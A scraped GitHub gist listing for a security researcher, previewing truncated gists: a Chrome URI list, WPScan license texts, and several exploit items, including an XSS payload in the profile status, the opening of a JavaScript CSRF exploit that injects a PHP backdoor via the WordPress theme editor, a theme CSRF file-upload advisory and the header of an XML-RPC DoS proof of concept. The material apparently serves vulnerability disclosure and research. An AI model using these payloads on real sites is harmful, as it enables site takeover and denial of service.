Skip to content

Instantly share code, notes, and snippets.

View ethicalhack3r's full-sized avatar
💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"

Ryan Dewhurst ethicalhack3r

💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"
1.2k followers · 9 following
View GitHub Profile
@ethicalhack3r
ethicalhack3r / chrome-uri.txt
Last active February 20, 2024 03:02
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from https://gsdview.appspot.com/chromium-browser-official/). A lot will not work, some are probably from unit tests.
chrome://-alkuisissa
chrome://-nettadresser
chrome://-webbadresser
chrome://ChromeTestChromeWebUIControllerFactory
chrome://DummyURL
chrome://URLs
chrome://about
chrome://accessibility
chrome://anything
chrome://app-list
@ethicalhack3r
ethicalhack3r / backdoor.js
Last active May 3, 2023 16:53
wp backdoor exploit (injects a PHP backdoor)
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
@ethicalhack3r
ethicalhack3r / post.txt
Created January 21, 2015 14:18
WPScan Licensing
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
@ethicalhack3r
ethicalhack3r / license.txt
Created January 21, 2015 14:17
WPScan Public Source License
WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
Definitions
“License” means this document.
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
@ethicalhack3r
ethicalhack3r / gist:66de53fb6a110f2834b9
Created January 18, 2015 17:20
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872
@ethicalhack3r
ethicalhack3r / advisory
Created December 6, 2014 09:39
Satoshi v2.0 - CSRF
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js
Localhost Demo:
@ethicalhack3r
ethicalhack3r / pluggable.php
Created November 18, 2014 15:41
WordPress authentication cookie generation using default keys
<?php
if ( !function_exists('wp_generate_auth_cookie') ) :
/**
* Generate authentication cookie contents.
*
* @since 2.5.0
*
* @param int $user_id User ID
* @param int $expiration Cookie expiration in seconds
@ethicalhack3r
ethicalhack3r / gist:cb06f575c6ba28644e9a
Created September 18, 2014 18:29
who.is XSS
$ ./dnsrecon.py -d jamiehankins.co.uk
[*] Performing General Enumeration of Domain: jamiehankins.co.uk
[-] DNSSEC is not configured for jamiehankins.co.uk
[*] SOA hank.ns.cloudflare.com 173.245.59.116
[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS hank.ns.cloudflare.com 173.245.59.116
[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS lucy.ns.cloudflare.com 173.245.58.133
[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
[*] MX aspmx2.googlemail.com 74.125.143.27
@ethicalhack3r
ethicalhack3r / test.html
Created September 18, 2014 17:02
Entering version numbers in HTML form
<!DOCTYPE html>
<html>
<body>
<input type="text" name="version1" value="1.0">
<select>
<option value="&lt;">&lt;</option>
<option value="&gt;">&gt;</option>
<option value="=">=</option>
@ethicalhack3r
ethicalhack3r / wp_dos.py
Created August 7, 2014 07:41
WP XML-RPC DoS Exploit
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib